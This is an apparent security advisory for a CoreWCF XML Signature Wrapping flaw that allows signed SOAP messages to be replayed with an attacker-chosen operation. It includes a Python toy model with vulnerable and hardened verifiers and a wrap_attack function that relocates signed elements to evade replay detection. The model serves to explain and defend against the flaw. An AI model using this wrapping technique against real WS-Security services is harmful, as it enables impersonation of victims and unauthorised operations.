CVE-2026-54783: CoreWCF: XML Signature Wrapping in WS-Security endorsing/supporting signature verification allows replay of captured signed messages
An attacker who holds a single signed SOAP envelope captured from a victim, and no other privileges, can invoke arbitrary operations on the service as the victim principal for as long as the captured signing key remains valid. Replays are not rate limited. The DetectReplays setting on transport-security bindings does not mitigate the issue: replay detection inspects the timestamp in the wsse:Security header, and the attack does not reuse the original timestamp. It presents a fresh timestamp there, while the signature still verifies against the captured, originally signed content that signature wrapping has relocated elsewhere in the message. Shortening the signing key's lifetime only narrows the replay window; the verification logic itself has to be fixed.
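The following Python model is added here for illustration; it is not CoreWCF code and is not taken from this advisory. It shows the class of bug the description names: a verifier that resolves signature References by wsu:Id anywhere in the document, while replay detection reads whatever Timestamp sits in the wsse:Security header. XML-DSig and C14N are replaced by an HMAC over a simple canonical form, the SOAP envelopes and the Wrapper element are constructed for the example, and the hardened variant (requiring the consumed Timestamp and Body to be the very elements the signature covered) is one generic fix, not CoreWCF's patch. The model also relocates the signed Body, a generalisation of the timestamp case the advisory spells out, to show how the same lookup lets the attacker choose the operation.

```python
"""Toy model of the XML Signature Wrapping pattern described above, constructed
for illustration: XML-DSig/C14N is replaced by an HMAC over a simple canonical
form, envelopes are built inline, and the Wrapper element is made up."""
import copy, hashlib, hmac
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

SOAP = "http://www.w3.org/2003/05/soap-envelope"
WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
DS = "http://www.w3.org/2000/09/xmldsig#"
q = lambda ns, local: "{%s}%s" % (ns, local)  # Clark-notation tag
WSU_ID, TS, CREATED = q(WSU, "Id"), q(WSU, "Timestamp"), q(WSU, "Created")
HEADER, BODY, SECURITY = q(SOAP, "Header"), q(SOAP, "Body"), q(WSSE, "Security")
FRESHNESS = timedelta(minutes=5)
KEY = b"constructed-demo-key"  # stands in for the captured signing key

def canon(elem):
    """Stand-in for C14N: like the real thing, the output does not record where
    the subtree sits in the document, which is the property wrapping abuses."""
    attrs = "".join("%s=%s;" % kv for kv in sorted(elem.attrib.items()))
    return "<%s %s>%s%s</%s>" % (elem.tag, attrs, (elem.text or "").strip(),
                                 "".join(canon(c) for c in elem), elem.tag)

def build_signed_envelope(created, operation, key=KEY):
    """Victim side: Timestamp and Body are both covered by the signature."""
    env = ET.Element(q(SOAP, "Envelope"))
    sec = ET.SubElement(ET.SubElement(env, HEADER), SECURITY)
    ts = ET.SubElement(sec, TS, {WSU_ID: "ts-1"})
    ET.SubElement(ts, CREATED).text = created.isoformat()
    body = ET.SubElement(env, BODY, {WSU_ID: "body-1"})
    body.text = operation
    sig, mac = ET.SubElement(sec, q(DS, "Signature")), hmac.new(key, b"", hashlib.sha256)
    for target in (ts, body):
        ET.SubElement(sig, q(DS, "Reference"), {"URI": "#" + target.get(WSU_ID)})
        mac.update(canon(target).encode())
    ET.SubElement(sig, q(DS, "SignatureValue")).text = mac.hexdigest()
    return env

def verify_references(root, key=KEY):
    """Resolve each Reference by wsu:Id anywhere in the document (any element
    carrying the Id will do) and check the MAC; returns the resolved elements."""
    sig = root.find(".//" + q(DS, "Signature"))
    if sig is None:
        return None
    mac, resolved = hmac.new(key, b"", hashlib.sha256), []
    for ref in sig.findall(q(DS, "Reference")):
        target = next((e for e in root.iter() if e.get(WSU_ID) == ref.get("URI")[1:]), None)
        if target is None:
            return None
        mac.update(canon(target).encode())
        resolved.append(target)
    ok = hmac.compare_digest(mac.hexdigest(), sig.findtext(q(DS, "SignatureValue"), ""))
    return resolved if ok else None

def replay_ok(ts, now, seen):
    """DetectReplays-style freshness and seen-before check on the Timestamp given."""
    created = datetime.fromisoformat(ts.findtext(CREATED))
    if abs(now - created) > FRESHNESS or created in seen:
        return False
    seen.add(created)
    return True

def vulnerable_process(root, now, seen, key=KEY):
    """Signature check and replay check each pick their own Timestamp (by Id
    anywhere vs. by position in the header); nothing ties the two together."""
    if verify_references(root, key) is None:
        return None
    if not replay_ok(root.find("./%s/%s/%s" % (HEADER, SECURITY, TS)), now, seen):
        return None
    return root.find(BODY).text  # the operation the service would dispatch

def hardened_process(root, now, seen, key=KEY):
    """Same checks, but the Timestamp and Body the service consumes must be the
    very element objects the signature was verified over."""
    resolved = verify_references(root, key)
    ts, body = root.find("./%s/%s/%s" % (HEADER, SECURITY, TS)), root.find(BODY)
    covered = resolved is not None and all(any(r is e for r in resolved) for e in (ts, body))
    if not covered or not replay_ok(ts, now, seen):
        return None
    return body.text

def wrap_attack(captured, now, operation):
    """Attacker side: relocate the signed Timestamp and Body, untouched and with
    their Ids, into a wrapper the service never reads, then put a fresh Timestamp
    and a chosen Body where it does read.  Every Reference still resolves."""
    env = copy.deepcopy(captured)
    header, body = env.find(HEADER), env.find(BODY)
    sec = header.find(SECURITY)
    ts = sec.find(TS)
    sec.remove(ts)
    env.remove(body)
    ET.SubElement(header, "Wrapper").extend([ts, body])
    fresh = ET.Element(TS, {WSU_ID: "ts-attacker"})
    ET.SubElement(fresh, CREATED).text = now.isoformat()
    sec.insert(0, fresh)
    ET.SubElement(env, BODY).text = operation
    return env

def demo():
    t0 = datetime(2026, 1, 1, 12, 0, tzinfo=timezone.utc)
    captured = build_signed_envelope(t0, "GetBalance")
    v_seen, h_seen = set(), set()  # one replay cache per service
    later = t0 + timedelta(hours=2)  # far outside the freshness window
    wrapped = wrap_attack(captured, later, "Transfer")
    return {"legit_vuln": vulnerable_process(captured, t0, v_seen),
            "legit_hard": hardened_process(captured, t0, h_seen),
            "verbatim_vuln": vulnerable_process(captured, t0 + timedelta(seconds=30), v_seen),
            "wrapped_vuln": vulnerable_process(wrapped, later, v_seen),
            "wrapped_hard": hardened_process(wrapped, later, h_seen)}
```

Running demo() shows the three cases that matter: both services accept the original message; the vulnerable service rejects a verbatim replay because the Created value has already been seen, which is all DetectReplays can do; and the same vulnerable service accepts the wrapped message two hours after capture with the attacker's operation in the Body, because the fresh header Timestamp passes the replay check while the signature still verifies over the relocated originals. The hardened service rejects the wrapped message because the Timestamp and Body it is about to act on are not the elements the signature covered.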